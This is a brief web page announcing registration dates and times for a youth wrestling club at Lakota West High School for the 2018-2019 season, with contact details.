Wrestling
Mark Your Calendars: Kids Wrestling Club Signups
The 2018-2019 wrestling season is quickly approaching! Registration for our youth wrestling club will be on Wednesday, October 17 and Monday, October 22 from 6:00-7:30 pm at Lakota West High School. Please enter the high school through the main entrance. Any questions please contact: firebirdyouthwrestling@yahoo.com
Kid Club Info and Registration
Follow us on Twitter: @LWHS_Wrestling
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();